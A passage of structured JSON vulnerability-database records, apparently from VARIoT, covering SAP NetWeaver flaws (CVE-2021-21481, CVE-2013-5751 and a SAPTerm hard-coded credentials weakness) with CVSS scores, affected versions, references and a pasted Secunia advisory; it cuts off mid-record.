"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "cna@sap.com",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-21481",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-21481",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "cna@sap.com",
"id": "CVE-2021-21481",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-202103-668",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-21481",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-21481"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-004419"
},
{
"db": "NVD",
"id": "CVE-2021-21481"
},
{
"db": "NVD",
"id": "CVE-2021-21481"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-668"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The MigrationService, which is part of SAP NetWeaver versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not perform an authorization check. This might allow an unauthorized attacker to access configuration objects, including such that grant administrative privileges. This could result in complete compromise of system confidentiality, integrity, and availability. SAP NetWeaver Contains an improper authentication vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-21481"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-004419"
},
{
"db": "VULMON",
"id": "CVE-2021-21481"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-21481",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2021-004419",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202103-668",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-21481",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-21481"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-004419"
},
{
"db": "NVD",
"id": "CVE-2021-21481"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-668"
}
]
},
"id": "VAR-202103-0644",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T14:00:12.465000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP\u00a0Security\u00a0Patch\u00a0Day\u00a0-\u00a0March\u00a02021",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=571343107"
},
{
"title": "SAP Netweaver Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=144380"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/sap-critical-rce-flaw-manufacturing/164666/"
},
{
"title": null,
"trust": 0.1,
"url": "https://www.theregister.co.uk/2021/04/13/patch_tuesday_april/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-21481"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-004419"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-668"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-863",
"trust": 1.0
},
{
"problemtype": "Bad authentication (CWE-863) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-004419"
},
{
"db": "NVD",
"id": "CVE-2021-21481"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://launchpad.support.sap.com/#/notes/3022422"
},
{
"trust": 1.7,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=571343107"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-21481"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/sap-multiple-vulnerabilities-of-march-2021-34786"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/sap-multiple-vulnerabilities-of-april-2021-35059"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/863.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://threatpost.com/sap-critical-rce-flaw-manufacturing/164666/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-21481"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-004419"
},
{
"db": "NVD",
"id": "CVE-2021-21481"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-668"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2021-21481"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-004419"
},
{
"db": "NVD",
"id": "CVE-2021-21481"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-668"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-03-09T00:00:00",
"db": "VULMON",
"id": "CVE-2021-21481"
},
{
"date": "2021-11-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-004419"
},
{
"date": "2021-03-09T15:15:14.787000",
"db": "NVD",
"id": "CVE-2021-21481"
},
{
"date": "2021-03-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202103-668"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-03-16T00:00:00",
"db": "VULMON",
"id": "CVE-2021-21481"
},
{
"date": "2021-11-22T02:06:00",
"db": "JVNDB",
"id": "JVNDB-2021-004419"
},
{
"date": "2021-03-16T17:34:45.720000",
"db": "NVD",
"id": "CVE-2021-21481"
},
{
"date": "2021-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202103-668"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-668"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP\u00a0NetWeaver\u00a0 Authentication Vulnerability in Microsoft",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-004419"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-668"
}
],
"trust": 0.6
}
}
var-201309-0338
Vulnerability from variot
Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors. SAP NetWeaver is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201309-0338",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.03"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
},
{
"model": "netweaver sp04",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver sp06",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver sr1",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp2",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp1",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "62391"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004189"
},
{
"db": "NVD",
"id": "CVE-2013-5751"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-235"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:sp15:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:sp8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.01:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.03:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-5751"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Pavel Toporkov of Positive Technologies",
"sources": [
{
"db": "BID",
"id": "62391"
}
],
"trust": 0.3
},
"cve": "CVE-2013-5751",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-5751",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-5751",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201309-235",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004189"
},
{
"db": "NVD",
"id": "CVE-2013-5751"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-235"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors. SAP NetWeaver is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. \nRemote attackers can use specially crafted requests with directory-traversal sequences (\u0027../\u0027) to retrieve arbitrary files in the context of the application. This may aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-5751"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004189"
},
{
"db": "BID",
"id": "62391"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-5751",
"trust": 2.7
},
{
"db": "SECUNIA",
"id": "54809",
"trust": 1.6
},
{
"db": "BID",
"id": "62391",
"trust": 1.3
},
{
"db": "OSVDB",
"id": "97350",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004189",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201309-235",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "62391"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004189"
},
{
"db": "NVD",
"id": "CVE-2013-5751"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-235"
}
]
},
"id": "VAR-201309-0338",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.418644048
},
"last_update_date": "2023-12-18T13:57:50.152000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004189"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004189"
},
{
"db": "NVD",
"id": "CVE-2013-5751"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://en.securitylab.ru/lab/pt-2012-24"
},
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/54809"
},
{
"trust": 1.6,
"url": "https://websmp230.sap-ag.de/sap/support/notes/1779578"
},
{
"trust": 1.0,
"url": "http://osvdb.org/97350"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/62391"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/87121"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5751"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5751"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004189"
},
{
"db": "NVD",
"id": "CVE-2013-5751"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-235"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "62391"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004189"
},
{
"db": "NVD",
"id": "CVE-2013-5751"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-235"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-13T00:00:00",
"db": "BID",
"id": "62391"
},
{
"date": "2013-09-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004189"
},
{
"date": "2013-09-16T19:14:40.037000",
"db": "NVD",
"id": "CVE-2013-5751"
},
{
"date": "2013-09-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201309-235"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-04-13T21:01:00",
"db": "BID",
"id": "62391"
},
{
"date": "2013-09-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004189"
},
{
"date": "2017-08-29T01:33:50.327000",
"db": "NVD",
"id": "CVE-2013-5751"
},
{
"date": "2013-09-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201309-235"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201309-235"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Directory Traversal Vulnerability",
"sources": [
{
"db": "BID",
"id": "62391"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-235"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201309-235"
}
],
"trust": 0.6
}
}
var-190001-0018
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There was an error running some reports to create an SAPTerm user with hard-coded user credentials by convincing the system administrator to run a report. SAP Netweaver is prone to a security-bypass vulnerability that can allow a user to create insecure SAPTerm user accounts. Attackers can exploit this issue to perform certain unauthorized actions. This may aid in further attacks. SAPTerm user. ----------------------------------------------------------------------
Frost & Sullivan 2011 Report: Secunia Vulnerability Research \"Frost & Sullivan believes that Secunia continues to be a major player in the vulnerability research market due to its diversity of products that provide best-in-class coverage, quality, and usability.\" This is just one of the key factors that influenced Frost & Sullivan to select Secunia over other companies. Read the report here: http://secunia.com/products/corporate/vim/fs_request_2011/
TITLE: SAP NetWeaver SAPTerm Hardcoded Credentials User Creation Weakness
SECUNIA ADVISORY ID: SA45034
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/45034/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=45034
RELEASE DATE: 2011-06-30
DISCUSS ADVISORY: http://secunia.com/advisories/45034/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/45034/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45034
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A weakness has been reported in SAP NetWeaver, which can be exploited by malicious users to manipulate certain data.
The weakness is reported in the following components: * SAP Basis versions 620 through 640. * SAP Basis versions 700 through 702. * SAP Basis versions 710 through 730. * SAP Basis versions 72L through 800.
SOLUTION: Apply fixes (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY: The vendor credits Julius von dem Bussche, Xiting AG.
ORIGINAL ADVISORY: SAP: https://service.sap.com/sap/support/notes/1542645
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-190001-0018",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "IVD",
"id": "eb3d9f4a-1f90-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2507"
},
{
"db": "BID",
"id": "48509"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
